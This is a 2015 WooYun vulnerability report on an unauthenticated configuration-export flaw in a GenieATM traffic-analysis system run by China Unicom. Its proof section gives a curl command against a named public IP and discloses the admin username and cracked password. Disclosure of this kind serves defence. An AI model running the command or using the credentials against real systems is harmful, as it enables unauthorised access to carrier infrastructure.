漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-091726
漏洞标题:联通云公司-流量分析系统GenieATM ISP存在非授权导出配置文件漏洞
相关厂商:中国联通
漏洞作者: 路人甲
提交时间:2015-01-15 12:28
修复时间:2015-01-20 12:30
公开时间:2015-01-20 12:30
漏洞类型:网络未授权访问
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
异常流量检测和迁移系统,运营商级别的设备,该类设备一般不会轻易暴露管理地址,所以案例并不能一一百度查询到
系统功能以及影响可以百度查询产品说明获得。
测试版本GenieATM ISP MPLS version: 5.6. 系列
该厂商并不是中国厂商,但是国内用户较多,多为运营商类,希望审核后转给cncert进行处理,如果不能修补漏洞,建议将后台进行隐藏,限制访问地址等!
详细说明:
测试版本GenieATM ISP MPLS version: 5.6存在非授权导出系统配置漏洞,且配置文件内包含管理员帐号和密码,虽然MD5加密,但是在测试的两个案例里面均可在CMD5进行查询。
联通云公司-流量分析系统
http://103.243.137.4/index.php
漏洞证明:
获取配置文件
curl "http://103.243.137.4/atm_loader_info?sno=71640642&info_type=DownloadConfig&config_ver=112" >1.txt
输出到1.txt文件中,
查找conf_user_info 处,存在用户密码hash
用户:genie2,密码为genie。
修复方案:
好像一直没有修复呀。
先前已经暴出电信、移动都使用该设备,这下齐了。
建议限制访问的IP地址。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-01-20 12:30
厂商回复:
最新状态:
暂无